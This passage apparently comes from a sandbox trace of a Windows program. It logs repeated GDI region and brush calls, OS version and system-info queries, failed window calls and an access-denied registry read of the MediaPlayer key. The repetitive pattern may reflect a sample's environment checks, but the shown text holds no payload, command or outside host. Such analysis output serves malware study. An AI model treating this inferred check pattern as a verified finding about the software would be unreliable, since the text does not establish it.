phkResult=0x181828*=0x0) returned 0x5 [0092.476] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x40401d9 [0092.476] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x20401dc [0092.476] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478f2 [0092.476] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478f3 [0092.476] CombineRgn (hrgnDst=0x10478f2, hrgnSrc1=0x40401d9, hrgnSrc2=0x20401dc, iMode=1) returned 1 [0092.476] CombineRgn (hrgnDst=0x10478f3, hrgnSrc1=0x40401d9, hrgnSrc2=0x20401dc, iMode=4) returned 2 [0092.476] CreateSolidBrush (color=0xff) returned 0x21078f1 [0092.476] CreateSolidBrush (color=0xff0000) returned 0x11078f4 [0092.476] DeleteObject (ho=0x11078f4) returned 1 [0092.476] DeleteObject (ho=0x20401dc) returned 1 [0092.476] DeleteObject (ho=0x40401d9) returned 1 [0092.476] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.476] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.476] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.476] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.476] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.476] BeginPath (hdc=0x0) returned 0 [0092.476] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.476] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.476] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.476] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.476] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.476] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.476] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.476] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.477] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x30401dc [0092.477] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x50401d9 [0092.477] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478f5 [0092.477] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478f6 [0092.477] CombineRgn (hrgnDst=0x10478f5, hrgnSrc1=0x30401dc, hrgnSrc2=0x50401d9, iMode=1) returned 1 [0092.477] CombineRgn (hrgnDst=0x10478f6, hrgnSrc1=0x30401dc, hrgnSrc2=0x50401d9, iMode=4) returned 2 [0092.477] CreateSolidBrush (color=0xff) returned 0x21078f4 [0092.477] CreateSolidBrush (color=0xff0000) returned 0x11078f7 [0092.477] DeleteObject (ho=0x11078f7) returned 1 [0092.477] DeleteObject (ho=0x50401d9) returned 1 [0092.477] DeleteObject (ho=0x30401dc) returned 1 [0092.477] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.477] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.477] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.477] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.477] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.477] BeginPath (hdc=0x0) returned 0 [0092.477] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.477] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.477] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.477] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.477] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.477] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.477] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.477] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.478] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x60401d9 [0092.478] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x40401dc [0092.478] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478f8 [0092.478] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478f9 [0092.478] CombineRgn (hrgnDst=0x10478f8, hrgnSrc1=0x60401d9, hrgnSrc2=0x40401dc, iMode=1) returned 1 [0092.478] CombineRgn (hrgnDst=0x10478f9, hrgnSrc1=0x60401d9, hrgnSrc2=0x40401dc, iMode=4) returned 2 [0092.478] CreateSolidBrush (color=0xff) returned 0x21078f7 [0092.478] CreateSolidBrush (color=0xff0000) returned 0x11078fa [0092.478] DeleteObject (ho=0x11078fa) returned 1 [0092.478] DeleteObject (ho=0x40401dc) returned 1 [0092.478] DeleteObject (ho=0x60401d9) returned 1 [0092.478] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.478] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.478] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.478] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.478] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.478] BeginPath (hdc=0x0) returned 0 [0092.478] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.478] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.478] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.478] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.478] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.478] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.478] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.478] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.479] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x50401dc [0092.479] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x70401d9 [0092.479] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478fb [0092.479] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478fc [0092.479] CombineRgn (hrgnDst=0x10478fb, hrgnSrc1=0x50401dc, hrgnSrc2=0x70401d9, iMode=1) returned 1 [0092.479] CombineRgn (hrgnDst=0x10478fc, hrgnSrc1=0x50401dc, hrgnSrc2=0x70401d9, iMode=4) returned 2 [0092.479] CreateSolidBrush (color=0xff) returned 0x21078fa [0092.479] CreateSolidBrush (color=0xff0000) returned 0x11078fd [0092.479] DeleteObject (ho=0x11078fd) returned 1 [0092.479] DeleteObject (ho=0x70401d9) returned 1 [0092.479] DeleteObject (ho=0x50401dc) returned 1 [0092.479] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.479] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.479] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.479] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.479] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.479] BeginPath (hdc=0x0) returned 0 [0092.479] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.479] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.479] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.479] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.479] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.479] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.479] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.479] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.480] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x80401d9 [0092.480] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x60401dc [0092.480] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478fe [0092.480] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478ff [0092.480] CombineRgn (hrgnDst=0x10478fe, hrgnSrc1=0x80401d9, hrgnSrc2=0x60401dc, iMode=1) returned 1 [0092.480] CombineRgn (hrgnDst=0x10478ff, hrgnSrc1=0x80401d9, hrgnSrc2=0x60401dc, iMode=4) returned 2 [0092.480] CreateSolidBrush (color=0xff) returned 0x21078fd [0092.480] CreateSolidBrush (color=0xff0000) returned 0x1107900 [0092.480] DeleteObject (ho=0x1107900) returned 1 [0092.480] DeleteObject (ho=0x60401dc) returned 1 [0092.480] DeleteObject (ho=0x80401d9) returned 1 [0092.480] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.480] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.480] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.480] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.480] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.480] BeginPath (hdc=0x0) returned 0 [0092.480] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.480] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.480] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.480] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.480] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.480] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.481] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.481] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.481] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x70401dc [0092.481] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x90401d9 [0092.481] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047901 [0092.481] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047902 [0092.481] CombineRgn (hrgnDst=0x1047901, hrgnSrc1=0x70401dc, hrgnSrc2=0x90401d9, iMode=1) returned 1 [0092.481] CombineRgn (hrgnDst=0x1047902, hrgnSrc1=0x70401dc, hrgnSrc2=0x90401d9, iMode=4) returned 2 [0092.482] CreateSolidBrush (color=0xff) returned 0x2107900 [0092.482] CreateSolidBrush (color=0xff0000) returned 0x1107903 [0092.482] DeleteObject (ho=0x1107903) returned 1 [0092.482] DeleteObject (ho=0x90401d9) returned 1 [0092.482] DeleteObject (ho=0x70401dc) returned 1 [0092.482] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.482] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.482] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.482] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.482] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.482] BeginPath (hdc=0x0) returned 0 [0092.482] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.482] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.482] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.482] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.482] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.482] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.482] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.482] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.483] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa0401d9 [0092.483] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x80401dc [0092.483] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047904 [0092.483] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047905 [0092.483] CombineRgn (hrgnDst=0x1047904, hrgnSrc1=0xa0401d9, hrgnSrc2=0x80401dc, iMode=1) returned 1 [0092.483] CombineRgn (hrgnDst=0x1047905, hrgnSrc1=0xa0401d9, hrgnSrc2=0x80401dc, iMode=4) returned 2 [0092.483] CreateSolidBrush (color=0xff) returned 0x2107903 [0092.483] CreateSolidBrush (color=0xff0000) returned 0x1107906 [0092.483] DeleteObject (ho=0x1107906) returned 1 [0092.483] DeleteObject (ho=0x80401dc) returned 1 [0092.483] DeleteObject (ho=0xa0401d9) returned 1 [0092.483] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.483] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.483] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.483] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.483] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.483] BeginPath (hdc=0x0) returned 0 [0092.483] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.483] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.483] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.483] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.483] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.483] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.483] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.483] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.483] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x90401dc [0092.484] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb0401d9 [0092.484] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047907 [0092.484] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047908 [0092.484] CombineRgn (hrgnDst=0x1047907, hrgnSrc1=0x90401dc, hrgnSrc2=0xb0401d9, iMode=1) returned 1 [0092.484] CombineRgn (hrgnDst=0x1047908, hrgnSrc1=0x90401dc, hrgnSrc2=0xb0401d9, iMode=4) returned 2 [0092.484] CreateSolidBrush (color=0xff) returned 0x2107906 [0092.484] CreateSolidBrush (color=0xff0000) returned 0x1107909 [0092.484] DeleteObject (ho=0x1107909) returned 1 [0092.484] DeleteObject (ho=0xb0401d9) returned 1 [0092.484] DeleteObject (ho=0x90401dc) returned 1 [0092.484] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.484] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.484] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.484] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.484] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.484] BeginPath (hdc=0x0) returned 0 [0092.484] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.484] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.484] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.484] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.484] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.484] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.484] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.484] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.484] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc0401d9 [0092.484] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa0401dc [0092.484] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104790a [0092.484] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104790b [0092.485] CombineRgn (hrgnDst=0x104790a, hrgnSrc1=0xc0401d9, hrgnSrc2=0xa0401dc, iMode=1) returned 1 [0092.485] CombineRgn (hrgnDst=0x104790b, hrgnSrc1=0xc0401d9, hrgnSrc2=0xa0401dc, iMode=4) returned 2 [0092.485] CreateSolidBrush (color=0xff) returned 0x2107909 [0092.485] CreateSolidBrush (color=0xff0000) returned 0x110790c [0092.485] DeleteObject (ho=0x110790c) returned 1 [0092.485] DeleteObject (ho=0xa0401dc) returned 1 [0092.485] DeleteObject (ho=0xc0401d9) returned 1 [0092.485] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.485] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.485] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.485] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.485] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.485] BeginPath (hdc=0x0) returned 0 [0092.485] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.485] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.485] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.485] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.485] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.485] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.485] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.485] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.485] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb0401dc [0092.485] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd0401d9 [0092.485] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104790d [0092.485] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104790e [0092.485] CombineRgn (hrgnDst=0x104790d, hrgnSrc1=0xb0401dc, hrgnSrc2=0xd0401d9, iMode=1) returned 1 [0092.485] CombineRgn (hrgnDst=0x104790e, hrgnSrc1=0xb0401dc, hrgnSrc2=0xd0401d9, iMode=4) returned 2 [0092.486] CreateSolidBrush (color=0xff) returned 0x210790c [0092.486] CreateSolidBrush (color=0xff0000) returned 0x110790f [0092.486] DeleteObject (ho=0x110790f) returned 1 [0092.486] DeleteObject (ho=0xd0401d9) returned 1 [0092.486] DeleteObject (ho=0xb0401dc) returned 1 [0092.486] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, 